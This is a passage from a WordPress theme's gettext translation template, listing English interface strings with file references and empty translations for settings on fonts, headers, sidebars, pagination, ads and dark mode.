msgstr "" #: backend/panels/typography.php:661 backend/panels/typography.php:1136 msgid "" "Select a font size (px) for buttons on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:508 msgid "" "Select a font size (px) for entry meta info on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:515 msgid "" "Select a font size (px) for entry meta info on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:611 msgid "" "Select a font size (px) for input and textarea on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:618 msgid "" "Select a font size (px) for input and textarea on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:60 msgid "" "Select a font size (px) for the body on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:53 msgid "" "Select a font size (px) for the body on the mobile device (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:871 msgid "" "Select a font size (px) for the breadcrumbs bar on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:878 msgid "" "Select a font size (px) for the breadcrumbs bar on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:442 msgid "" "Select a font size (px) for the entry category element on mobile devices " "(max screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:449 msgid "" "Select a font size (px) for the entry category element on tablet devices " "(max screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:99 msgid "" "Select a font size (px) for the excerpt on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:106 msgid "" "Select a font size (px) for the excerpt on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:92 msgid "" "Select a font size (px) for the excerpt. Leave this option blank to set the " "default value." msgstr "" #: backend/panels/typography.php:1057 msgid "" "Select a font size (px) for the heading block on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:1064 msgid "" "Select a font size (px) for the heading block on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/category-settings.php:442 backend/panels/blog-pages.php:469 #: backend/panels/blog-pages.php:956 backend/panels/blog-pages.php:1370 #: backend/panels/blog-pages.php:1778 backend/panels/blog-pages.php:2270 #: backend/panels/bookmark.php:368 backend/panels/bookmark.php:816 msgid "" "Select a font size (px) for the post title in the desktop device. Leave " "blank to set it as the default." msgstr "" #: backend/category-settings.php:458 backend/panels/blog-pages.php:483 #: backend/panels/blog-pages.php:970 backend/panels/blog-pages.php:1384 #: backend/panels/blog-pages.php:1792 backend/panels/blog-pages.php:2284 #: backend/panels/bookmark.php:382 backend/panels/bookmark.php:830 msgid "" "Select a font size (px) for the post title in the mobile device. Leave blank " "to set it as the default." msgstr "" #: backend/category-settings.php:450 backend/panels/blog-pages.php:476 #: backend/panels/blog-pages.php:963 backend/panels/blog-pages.php:1377 #: backend/panels/blog-pages.php:1785 backend/panels/blog-pages.php:2277 #: backend/panels/bookmark.php:375 backend/panels/bookmark.php:823 msgid "" "Select a font size (px) for the post title in the table devices. Leave blank " "to set it as the default." msgstr "" #: backend/panels/typography.php:556 msgid "" "Select a font size (px) for the readmore button on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:563 msgid "" "Select a font size (px) for the readmore button on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:730 msgid "" "Select a font size (px) for the single headline on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:737 msgid "" "Select a font size (px) for the single headline on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:723 #, php-format msgid "" "Select a font size (px) for the single headline or displaying in 66.67% of " "the site width." msgstr "" #: backend/panels/typography.php:787 msgid "" "Select a font size (px) for the single tagline on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:794 msgid "" "Select a font size (px) for the single tagline on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:780 #, php-format msgid "" "Select a font size (px) for the single tagline or displaying in 66.67% of " "the site width." msgstr "" #: backend/panels/typography.php:148 backend/panels/typography.php:197 #: backend/panels/typography.php:246 backend/panels/typography.php:295 #: backend/panels/typography.php:344 backend/panels/typography.php:393 msgid "" "Select a font size (px) for this heading tag on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:155 backend/panels/typography.php:204 #: backend/panels/typography.php:253 backend/panels/typography.php:302 #: backend/panels/typography.php:351 backend/panels/typography.php:400 msgid "" "Select a font size (px) for this heading tag on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/single-post.php:206 msgid "Select a font style for the post hyperlinks." msgstr "" #: backend/panels/header.php:150 backend/panels/header.php:382 msgid "Select a footer menu to display at the bottom of this section." msgstr "" #: backend/single-metaboxes.php:425 msgid "" "Select a gallery layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/color.php:37 msgid "Select a global color in the dark mode." msgstr "" #: backend/panels/color.php:29 msgid "" "Select a global color, This setting apply to all links, menu, category " "overlays, main page and many contrasting elements." msgstr "" #: backend/panels/single-post.php:104 msgid "Select a global layout for the audio post format." msgstr "" #: backend/panels/single-post.php:133 msgid "Select a global layout for the gallery post format." msgstr "" #: backend/panels/single-post.php:67 msgid "Select a global layout for the video post format." msgstr "" #: backend/panels/page.php:31 msgid "Select a header style for the single page." msgstr "" #: backend/category-settings.php:57 msgid "Select a header style for this category." msgstr "" #: backend/panels/heading.php:105 msgid "Select a heading layout for the footer column widgets." msgstr "" #: backend/category-settings.php:190 backend/panels/blog-pages.php:212 #: backend/panels/bookmark.php:525 backend/panels/single-post.php:1312 msgid "Select a heading layout for the heading." msgstr "" #: backend/panels/heading.php:96 msgid "Select a heading layout for the sidebar widgets." msgstr "" #: backend/category-settings.php:31 backend/panels/design.php:45 msgid "" "Select a highlight color for the entry category to display in the post " "listing." msgstr "" #: backend/panels/single-post.php:516 msgid "Select a HTML tag for the single tagline to optimize your SEO settings." msgstr "" #: backend/panels/single-post.php:530 msgid "Select a HTML tag for the single tagline." msgstr "" #: backend/panels/bookmark.php:533 backend/panels/single-post.php:1320 msgid "Select a HTML tag for this heading." msgstr "" #: backend/category-settings.php:198 backend/panels/blog-pages.php:220 msgid "" "Select a HTML tag for this heading. Leave this option blank to set the " "default." msgstr "" #: backend/single-metaboxes.php:220 msgid "Select a HTML tag for this tagline." msgstr "" #: backend/panels/single-post.php:1337 msgid "Select a layout for the blog listing." msgstr "" #: backend/panels/block-classic.php:40 backend/panels/block-grid.php:40 #: backend/panels/block-grid.php:205 backend/panels/block-grid.php:370 #: backend/panels/block-grid.php:543 backend/panels/block-grid.php:730 #: backend/panels/block-list.php:48 backend/panels/block-list.php:221 #: backend/panels/block-list.php:402 backend/panels/block-list.php:597 #: backend/panels/blog-pages.php:365 backend/panels/blog-pages.php:852 #: backend/panels/blog-pages.php:1266 backend/panels/blog-pages.php:1674 #: backend/panels/blog-pages.php:2166 backend/panels/bookmark.php:265 #: backend/panels/bookmark.php:713 msgid "Select a layout for the entry category to display in the post listing." msgstr "" #: backend/panels/footer.php:91 msgid "Select a layout for the footer widget area." msgstr "" #: backend/panels/header.php:341 msgid "Select a layout for the mobile header." msgstr "" #: backend/panels/header.php:548 msgid "Select a layout for the sign in trigger button." msgstr "" #: backend/single-metaboxes.php:723 msgid "Select a layout for the table of contents of this post." msgstr "" #: backend/panels/table-contents.php:111 msgid "Select a layout for the table of contents." msgstr "" #: backend/panels/page.php:43 backend/panels/single-post.php:183 #: backend/single-metaboxes.php:70 msgid "Select a max-width for the content area without sidebar." msgstr "" #: backend/panels/footer.php:200 msgid "Select a menu to display in the footer copyright bar." msgstr "" #: backend/panels/newsletter.php:94 msgid "Select a mode to display the newsletter popup." msgstr "" #: backend/panels/single-post.php:1368 msgid "Select a pagination type for the related section." msgstr "" #: backend/panels/block-list.php:40 backend/panels/block-list.php:213 #: backend/panels/block-list.php:394 backend/panels/block-list.php:589 msgid "Select a position for the featured image. " msgstr "" #: backend/panels/login.php:37 msgid "Select a position for the login form." msgstr "" #: backend/single-metaboxes.php:89 msgid "" "Select a position for the sidebar of this page. It will override on the " "default settings in the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:448 msgid "" "Select a position for the sidebar of this post. It will override on the " "default settings in the Theme Options panel." msgstr "" #: backend/panels/single-post.php:442 msgid "" "Select a position for the single sidebar. You can set an individual sidebar " "position for each post in the post editor page." msgstr "" #: backend/panels/privacy.php:22 msgid "Select a position to display the privacy box." msgstr "" #: backend/single-metaboxes.php:275 msgid "Select a Primary Category for this post." msgstr "" #: backend/panels/heading.php:67 backend/panels/heading.php:152 msgid "Select a primary color for the heading in the dark mode." msgstr "" #: backend/panels/heading.php:50 backend/panels/heading.php:135 msgid "Select a primary color for the heading." msgstr "" #: backend/panels/woocommerce.php:117 msgid "" "Select a sidebar for product category and archive pages if you enabled the " "sidebar." msgstr "" #: backend/panels/woocommerce.php:88 msgid "Select a sidebar for the shop page if you enabled the sidebar." msgstr "" #: backend/panels/woocommerce.php:109 msgid "" "Select a sidebar position for product category and archive pages if you " "enabled the sidebar." msgstr "" #: backend/panels/blog-pages.php:306 backend/panels/blog-pages.php:793 #: backend/panels/blog-pages.php:1207 backend/panels/blog-pages.php:1615 #: backend/panels/bookmark.php:209 msgid "Select a sidebar position or disable it for the latest blog section" msgstr "" #: backend/category-settings.php:296 msgid "Select a sidebar position or disable it for the latest blog section." msgstr "" #: backend/panels/blog-pages.php:2107 msgid "Select a sidebar position or disable it for the search result listing." msgstr "" #: backend/panels/page.php:67 msgid "Select a sidebar position or disable it for the single page." msgstr "" #: backend/panels/bookmark.php:657 msgid "Select a sidebar position or disable it for this section." msgstr "" #: backend/panels/single-post.php:1556 msgid "Select a site header style for the single post." msgstr "" #: backend/single-metaboxes.php:114 msgid "Select a site header style for this page" msgstr "" #: backend/single-metaboxes.php:891 msgid "Select a site header style for this post." msgstr "" #: backend/panels/amp.php:329 backend/panels/amp.php:389 #: backend/panels/amp.php:449 backend/panels/amp.php:510 #: backend/panels/amp.php:570 msgid "Select a size for this ad." msgstr "" #: backend/panels/ads.php:142 backend/panels/ads.php:331 msgid "Select a size on the desktop device." msgstr "" #: backend/panels/ads.php:158 backend/panels/ads.php:347 msgid "Select a size on the mobile device." msgstr "" #: backend/panels/ads.php:150 backend/panels/ads.php:339 msgid "Select a size on the tablet device." msgstr "" #: backend/category-settings.php:283 msgid "Select a spacing between columns for the blog listing layout." msgstr "" #: backend/panels/blog-pages.php:283 backend/panels/blog-pages.php:770 #: backend/panels/blog-pages.php:1184 backend/panels/blog-pages.php:1592 #: backend/panels/blog-pages.php:2084 backend/panels/bookmark.php:187 #: backend/panels/bookmark.php:627 backend/panels/bookmark.php:635 msgid "Select a spacing between columns." msgstr "" #: backend/single-metaboxes.php:305 msgid "" "Select a standard layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/header-style.php:239 backend/panels/header-style.php:528 #: backend/panels/header-style.php:794 msgid "" "Select a text color for displaying in sub menus and other dropdown sections " "of this header in the dark mode." msgstr "" #: backend/panels/header-style.php:161 backend/panels/header-style.php:450 #: backend/panels/header-style.php:716 msgid "" "Select a text color for displaying in sub menus and other dropdown sections " "of this header." msgstr "" #: backend/panels/header-style.php:269 msgid "" "Select a text color for displaying in the navigation bar of the transparent " "header." msgstr "" #: backend/panels/header-style.php:203 backend/panels/header-style.php:492 #: backend/panels/header-style.php:758 msgid "" "Select a text color for displaying in the navigation bar of this header in " "the dark mode." msgstr "" #: backend/panels/header-style.php:125 backend/panels/header-style.php:413 #: backend/panels/header-style.php:680 msgid "" "Select a text color for displaying in the navigation bar of this header." msgstr "" #: backend/panels/header.php:494 msgid "" "Select a text color for menu item, sub menu item and other elements for " "displaying in the collapse section in the dark mode." msgstr "" #: backend/panels/header.php:441 msgid "" "Select a text color for menu item, sub menu item and other elements for " "displaying in the collapse section." msgstr "" #: backend/category-settings.php:45 backend/panels/design.php:61 msgid "" "Select a text color for the entry category to display in the post listing in " "the dark mode." msgstr "" #: backend/category-settings.php:38 backend/panels/design.php:53 msgid "" "Select a text color for the entry category to display in the post listing. " "Leave blank to set it as the default." msgstr "" #: backend/panels/header.php:474 msgid "" "Select a text color for toggle button, search, quick view menu for " "displaying on the mobile header in the dark mode." msgstr "" #: backend/panels/header.php:421 msgid "" "Select a text color for toggle button, search, quick view menu for " "displaying on the mobile header." msgstr "" #: backend/panels/footer.php:62 msgid "Select a text color scheme for the footer." msgstr "" #: backend/panels/header.php:285 msgid "Select a text color scheme to fit with the sub menu background." msgstr "" #: backend/panels/header-style.php:211 backend/panels/header-style.php:247 #: backend/panels/header-style.php:500 backend/panels/header-style.php:536 #: backend/panels/header-style.php:766 backend/panels/header-style.php:802 msgid "Select a text color when hovering in the dark mode." msgstr "" #: backend/panels/header-style.php:133 backend/panels/header-style.php:169 #: backend/panels/header-style.php:277 backend/panels/header-style.php:421 #: backend/panels/header-style.php:458 backend/panels/header-style.php:688 #: backend/panels/header-style.php:724 msgid "Select a text color when hovering." msgstr "" #: backend/category-settings.php:434 backend/panels/block-classic.php:121 #: backend/panels/block-grid.php:121 backend/panels/block-grid.php:286 #: backend/panels/block-grid.php:451 backend/panels/block-grid.php:624 #: backend/panels/block-grid.php:811 backend/panels/block-list.php:129 #: backend/panels/block-list.php:302 backend/panels/block-list.php:483 #: backend/panels/block-list.php:678 backend/panels/blog-pages.php:461 #: backend/panels/blog-pages.php:948 backend/panels/blog-pages.php:1362 #: backend/panels/blog-pages.php:1770 backend/panels/blog-pages.php:2262 #: backend/panels/bookmark.php:360 backend/panels/bookmark.php:808 msgid "Select a title HTML tag for the post title." msgstr "" #: backend/panels/heading.php:113 msgid "Select a title HTML tag for the sidebar widget heading." msgstr "" #: backend/panels/ads.php:238 msgid "Select a top and bottom spacing for the advert." msgstr "" #: backend/single-metaboxes.php:57 msgid "" "Select a top header style for this page. This option is used for the single " "page (not Elementor page)." msgstr "" #: backend/single-metaboxes.php:504 msgid "Select a type of review for this post." msgstr "" #: backend/single-metaboxes.php:323 msgid "" "Select a video layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/blog-pages.php:604 msgid "Select a website header style for the blog page." msgstr "" #: backend/panels/blog-pages.php:38 msgid "Select a website header style for the category pages." msgstr "" #: backend/panels/blog-pages.php:1922 msgid "Select a website header style for the search page." msgstr "" #: backend/panels/header-style.php:57 backend/panels/header-style.php:351 #: backend/panels/header-style.php:602 msgid "Select a width style for this header." msgstr "" #: backend/panels/ads.php:78 msgid "Select ad settings for displaying at the top of your website." msgstr "" #: backend/panels/ads.php:266 msgid "Select ad settings for displaying inside the single post content." msgstr "" #: backend/panels/ads.php:16 msgid "Select ad settings for your website." msgstr "" #: backend/panels/header.php:699 msgid "Select background color for the bar in the dark mode." msgstr "" #: backend/panels/header.php:683 msgid "Select background color for the bar." msgstr "" #: backend/panels/blog-pages.php:1560 msgid "Select blog listing layout for the archive pages." msgstr "" #: backend/panels/blog-pages.php:1152 msgid "Select blog listing layout for the author pages." msgstr "" #: backend/panels/blog-pages.php:738 msgid "Select blog listing layout for the blog." msgstr "" #: backend/panels/blog-pages.php:251 msgid "Select blog listing layout for the category pages." msgstr "" #: backend/panels/bookmark.php:155 msgid "Select blog listing layout for the saved pages." msgstr "" #: backend/panels/blog-pages.php:2052 msgid "Select blog listing layout for the search result listing." msgstr "" #: backend/category-settings.php:239 msgid "Select blog listing layout for this category." msgstr "" #: backend/panels/bookmark.php:595 msgid "Select blog listing layout for this section." msgstr "" #: backend/panels/color.php:16 msgid "" "Select colors for your website. To organize the panel and make it easy to " "use, you may also see color settings for each elements in it's panel." msgstr "" #: backend/panels/header.php:127 msgid "Select columns per row for this section." msgstr "" #: backend/panels/color.php:66 msgid "Select dark accent color in the dark mode." msgstr "" #: backend/panels/block-classic.php:148 backend/panels/block-grid.php:148 #: backend/panels/block-grid.php:313 backend/panels/block-grid.php:478 #: backend/panels/block-grid.php:651 backend/panels/block-grid.php:838 #: backend/panels/block-list.php:156 backend/panels/block-list.php:329 #: backend/panels/block-list.php:510 backend/panels/block-list.php:705 msgid "" "Select entry meta tags you would like to hide on the mobile devices. In case " "long meta it would be useful." msgstr "" #: backend/panels/block-classic.php:139 backend/panels/block-grid.php:139 #: backend/panels/block-grid.php:304 backend/panels/block-grid.php:469 #: backend/panels/block-grid.php:642 backend/panels/block-grid.php:829 #: backend/panels/block-list.php:147 backend/panels/block-list.php:320 #: backend/panels/block-list.php:501 backend/panels/block-list.php:696 msgid "" "Select entry meta tags you would like to hide on the tablet devices. In case " "long meta it would be useful." msgstr "" #: backend/panels/bookmark.php:404 msgid "" "Select entry meta you would like to hide on the mobile devices. In case long " "meta it would be useful." msgstr "" #: backend/panels/typography.php:999 msgid "" "Select font for mobile quick access menu items for displaying in the mobile " "device." msgstr "" #: backend/panels/typography.php:925 msgid "Select font for sub-level menu items for displaying in the main menu." msgstr "" #: backend/panels/typography.php:970 msgid "Select font for sub-level menu items for displaying in the mobile menu." msgstr "" #: backend/panels/typography.php:1112 msgid "Select font for the default archives, categories and menu fonts." msgstr "" #: backend/panels/typography.php:424 msgid "Select font for the entry category element." msgstr "" #: backend/panels/typography.php:124 msgid "" "Select font for the H1 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:173 msgid "" "Select font for the H2 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:222 msgid "" "Select font for the H3 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:271 msgid "" "Select font for the H4 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:320 msgid "" "Select font for the H5 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:369 msgid "" "Select font for the H6 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:581 msgid "" "Select font for the input, textarea and button. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:909 msgid "Select font for top menu items for displaying in the main menu." msgstr "" #: backend/panels/typography.php:954 msgid "Select font for top menu items for displaying in the mobile menu." msgstr "" #: backend/panels/typography.php:78 msgid "Select font sizes for the excerpt in the post listing." msgstr "" #: backend/panels/typography.php:473 msgid "" "Select font values for entry meta info: date, view, comment... Those options " "will not apply to the author meta." msgstr "" #: backend/panels/typography.php:896 msgid "Select font values for menus on the website header." msgstr "" #: backend/panels/typography.php:686 msgid "" "Select font values for Single Headline (Single Post Title) and Single " "Tagline (Single Sub Title)." msgstr "" #: backend/panels/typography.php:489 msgid "" "Select font values for the author, category meta, review description and " "sponsored brand." msgstr "" #: backend/panels/typography.php:1033 msgid "Select font values for the block heading." msgstr "" #: backend/panels/typography.php:813 msgid "Select font values for the block quote." msgstr "" #: backend/panels/typography.php:848 msgid "" "Select font values for the breadcrumb bar. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:1099 msgid "" "Select font values for the default widgets, apply to the archive, category " "widgets..." msgstr "" #: backend/panels/typography.php:418 msgid "" "Select font values for the entry category (category icon) in the post " "listing." msgstr "" #: backend/panels/typography.php:130 msgid "Select font values for the H1 tag and [ CSS classname: .h1]" msgstr "" #: backend/panels/typography.php:179 msgid "Select font values for the H2 tag and [ CSS classname: .h2]" msgstr "" #: backend/panels/typography.php:228 msgid "Select font values for the H3 tag and [ CSS classname: .h3]" msgstr "" #: backend/panels/typography.php:277 msgid "Select font values for the H4 tag and [ CSS classname: .h4]" msgstr "" #: backend/panels/typography.php:326 msgid "Select font values for the H5 tag and [ CSS classname: .h5]" msgstr "" #: backend/panels/typography.php:375 msgid "Select font values for the H6 tag and [ CSS classname: .h6]" msgstr "" #: backend/panels/typography.php:467 msgid "" "Select font values for the post entry meta. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:539 msgid "Select font values for the read more button" msgstr "" #: backend/panels/typography.php:533 msgid "Select font values for the read more button." msgstr "" #: backend/panels/typography.php:705 msgid "" "Select font values for the single headline for displaying in the full width " "layouts." msgstr "" #: backend/panels/typography.php:762 msgid "" "Select font values for the single tagline for displaying in the full width " "layouts." msgstr "" #: backend/panels/typography.php:30 msgid "" "Select font values for your website. The settings below apply to almost " "content elements on the website." msgstr "" #: backend/panels/bookmark.php:30 msgid "Select general settings for the bookmark system." msgstr "" #: backend/panels/design.php:569 msgid "Select hover effect settings for your website." msgstr "" #: backend/panels/single-post.php:30 msgid "Select layouts for the single post that based on the post formats." msgstr "" #: backend/category-settings.php:409 backend/panels/block-classic.php:91 #: backend/panels/block-grid.php:91 backend/panels/block-grid.php:256 #: backend/panels/block-grid.php:421 backend/panels/block-grid.php:594 #: backend/panels/block-grid.php:781 backend/panels/block-list.php:99 #: backend/panels/block-list.php:272 backend/panels/block-list.php:453 #: backend/panels/block-list.php:648 backend/panels/blog-pages.php:436 #: backend/panels/blog-pages.php:923 backend/panels/blog-pages.php:1337 #: backend/panels/blog-pages.php:1745 backend/panels/blog-pages.php:2237 #: backend/panels/bookmark.php:335 backend/panels/bookmark.php:783 msgid "select max length of the post excerpt." msgstr "" #: backend/panels/header.php:204 msgid "Select mode for the search button when clicking on." msgstr "" #: backend/single-metaboxes.php:130 msgid "Select navigation bar style for the header of this page." msgstr "" #: backend/single-metaboxes.php:907 msgid "Select navigation bar style for the header of this post." msgstr "" #: backend/panels/blog-pages.php:612 msgid "Select navigation bar style for the site header in the blog index page." msgstr "" #: backend/panels/blog-pages.php:46 msgid "Select navigation bar style for the site header in the category pages." msgstr "" #: backend/panels/blog-pages.php:1930 msgid "Select navigation bar style for the site header in the search page." msgstr "" #: backend/panels/header-style.php:69 backend/panels/header-style.php:614 msgid "Select navigation bar style for these header styles." msgstr "" #: backend/panels/single-post.php:1362 msgid "Select number of posts to show at once." msgstr "" #: backend/panels/woocommerce.php:72 msgid "" "Select number of products per page, leave blank if you want to set as " "Settings default." msgstr "" #: backend/panels/login.php:13 msgid "Select option for the login screen page." msgstr "" #: backend/panels/single-post.php:157 msgid "Select options for content area." msgstr "" #: backend/panels/single-post.php:1426 msgid "Select options for the ajax load next posts feature." msgstr "" #: backend/panels/header.php:115 msgid "" "Select options for the more menu and enable/disable it for each header style." msgstr "" #: backend/panels/privacy.php:8 msgid "Select options for the privacy notice bar." msgstr "" #: backend/panels/reaction.php:17 msgid "Select options for the reaction section." msgstr "" #: backend/panels/single-post.php:1251 msgid "" "Select options for the related and popular section at the footer of the " "single post page." msgstr "" #: backend/panels/single-post.php:1158 msgid "Select options for the review system." msgstr "" #: backend/panels/woocommerce.php:45 msgid "Select options for the shop and archive and single product pages." msgstr "" #: backend/panels/woocommerce.php:29 msgid "Select options for the shop." msgstr "" #: backend/panels/footer.php:16 msgid "" "Select options for your website footer. Navigate to Appearance > Widgets to " "add widgets to footer sections." msgstr "" #: backend/panels/header.php:17 msgid "Select options for your website header." msgstr "" #: backend/panels/optimized.php:15 msgid "Select options to optimize your website speed." msgstr "" #: backend/panels/logo.php:55 msgid "" "Select or upload a light logo for displaying in the dark mode. It should be " "same dimensions with the site logo." msgstr "" #: backend/panels/logo.php:71 msgid "" "Select or upload a light retina logo for displaying in the dark mode. It " "should be same dimensions with the retina site logo" msgstr "" #: backend/panels/logo.php:150 msgid "Select or upload bookmarklet icons for iOS and Android devices." msgstr "" #: backend/panels/logo.php:86 msgid "Select or upload logos for displaying in the mobile device." msgstr "" #: backend/panels/logo.php:116 msgid "Select or upload logos for displaying in the transparent headers." msgstr "" #: backend/panels/logo.php:63 msgid "" "Select or upload retina (2x) logo. Recommended logo height value is 120px, " "allowed extensions are .jpg, .png and .gif" msgstr "" #: backend/panels/logo.php:47 msgid "" "Select or upload site logo. Recommended logo height value is 60px, allowed " "extensions are .jpg, .png and .gif." msgstr "" #: backend/panels/blog-pages.php:1857 msgid "Select pagination type for the archive pages." msgstr "" #: backend/panels/blog-pages.php:1449 msgid "Select pagination type for the author pages." msgstr "" #: backend/panels/blog-pages.php:1036 msgid "Select pagination type for the blog." msgstr "" #: backend/panels/blog-pages.php:548 msgid "Select pagination type for the category pages." msgstr "" #: backend/panels/blog-pages.php:2349 msgid "Select pagination type for the search result listing." msgstr "" #: backend/category-settings.php:226 msgid "Select pagination type for this category." msgstr "" #: backend/panels/bookmark.php:570 msgid "Select pagination type for this section." msgstr "" #: backend/panels/design.php:255 msgid "Select position for the custom meta label at the beginning or end." msgstr "" #: backend/panels/design.php:314 msgid "Select position to crop the featured image." msgstr "" #: backend/panels/blog-pages.php:1538 msgid "" "Select posts per page for the archives. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:1129 msgid "" "Select posts per page for the authors. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:714 msgid "" "Select posts per page for the blog. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:178 msgid "" "Select posts per page for the categories. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:2030 msgid "" "Select posts per page for the search result listing. Leave this option blank " "to set the default." msgstr "" #: backend/category-settings.php:170 msgid "" "Select posts per page for this category. Leave this option blank to set the " "default." msgstr "" #: backend/panels/bookmark.php:562 msgid "Select posts per page for this section." msgstr "" #: backend/single-metaboxes.php:271 msgid "Select Primary Category" msgstr "" #: backend/panels/reaction.php:38 msgid "Select reaction items you would like to show." msgstr "" #: backend/panels/optimized.php:108 msgid "" "Select SEO options for your website. This panel helps your website optimized " "for SEO and appear better on the search engines." msgstr "" #: backend/panels/amp.php:278 msgid "Select setting for ads in AMP mode." msgstr "" #: backend/panels/amp.php:248 msgid "Select setting for auto ads in AMP mode." msgstr "" #: backend/panels/amp.php:172 msgid "Select setting for the single post your website in AMP mode." msgstr "" #: backend/panels/amp.php:29 backend/panels/amp.php:41 msgid "Select setting for your website in AMP mode." msgstr "" #: backend/panels/design.php:419 msgid "Select settings for post sliders on your website." msgstr "" #: backend/panels/header.php:176 msgid "Select settings for search form to display in the website header." msgstr "" #: backend/panels/table-contents.php:16 msgid "Select settings for table of contents." msgstr "" #: backend/panels/bookmark.php:16 msgid "Select settings for the bookmark system." msgstr "" #: backend/panels/single-post.php:1205 msgid "Select settings for the comment box." msgstr "" #: backend/panels/dark-mode.php:17 msgid "Select settings for the dark mode." msgstr "" #: backend/panels/single-post.php:472 msgid "Select settings for the entry category." msgstr "" #: backend/category-settings.php:346 backend/panels/block-classic.php:50 #: backend/panels/block-grid.php:50 backend/panels/block-grid.php:215 #: backend/panels/block-grid.php:380 backend/panels/block-grid.php:553 #: backend/panels/block-grid.php:740 backend/panels/block-list.php:58 #: backend/panels/block-list.php:231 backend/panels/block-list.php:412 #: backend/panels/block-list.php:607 backend/panels/blog-pages.php:375 #: backend/panels/blog-pages.php:862 backend/panels/blog-pages.php:1276 #: backend/panels/blog-pages.php:1684 backend/panels/blog-pages.php:2176 #: backend/panels/bookmark.php:274 backend/panels/bookmark.php:722 msgid "Select settings for the entry meta bar." msgstr "" #: backend/panels/newsletter.php:15 msgid "Select settings for the popup newsletter." msgstr "" #: backend/panels/header.php:520 msgid "Select settings for the popup sign in form." msgstr "" #: backend/category-settings.php:398 msgid "Select settings for the post excerpt." msgstr "" #: backend/panels/design.php:296 msgid "Select settings for the post featured image on your website." msgstr "" #: backend/panels/design.php:536 msgid "" "Select settings for the read more button on your website. You can " "enable/disable this part per module via Modules Design section." msgstr "" #: backend/panels/bookmark.php:90 msgid "Select settings for the reading list section." msgstr "" #: backend/panels/bookmark.php:504 msgid "Select settings for the recommended section." msgstr "" #: backend/panels/single-post.php:426 msgid "Select settings for the single sidebar." msgstr "" #: backend/panels/single-post.php:1125 msgid "Select settings for the sponsored posts." msgstr "" #: backend/panels/bookmark.php:440 msgid "Select settings for the user interests section." msgstr "" #: backend/panels/design.php:471 msgid "Select settings for your post entry meta." msgstr "" #: backend/panels/sidebar.php:8 msgid "" "Select settings for your website sidebars, The settings below apply to all " "sidebars." msgstr "" #: backend/panels/woocommerce.php:80 msgid "Select sidebar position for the shop page if you enabled the sidebar." msgstr "" #: backend/panels/single-post.php:692 msgid "Select socials you would like to show the share button." msgstr "" #: backend/panels/single-post.php:562 msgid "Select styles, layouts and other settings for the single post meta." msgstr "" #: backend/panels/woocommerce.php:173 msgid "Select styling options of your shop." msgstr "" #: backend/panels/header.php:707 msgid "Select text color for the bar in the dark mode." msgstr "" #: backend/panels/header.php:691 msgid "Select text color for the bar." msgstr "" #: backend/panels/sidebar.php:27 msgid "Select the default sidebar position for your website." msgstr "" #: backend/panels/header.php:51 msgid "Select the global header style for your website header." msgstr "" #: backend/panels/header.php:34 msgid "Select the style and other settings for your website header." msgstr "" #: backend/category-settings.php:259 msgid "" "Select total columns to show per row for the blog listing layout on the " "desktop device." msgstr "" #: backend/category-settings.php:275 msgid "" "Select total columns to show per row for the blog listing layout on the " "mobile device." msgstr "" #: backend/category-settings.php:267 msgid "" "Select total columns to show per row for the blog listing layout on the " "tablet device." msgstr "" #: backend/panels/blog-pages.php:275 backend/panels/blog-pages.php:762 #: backend/panels/blog-pages.php:1176 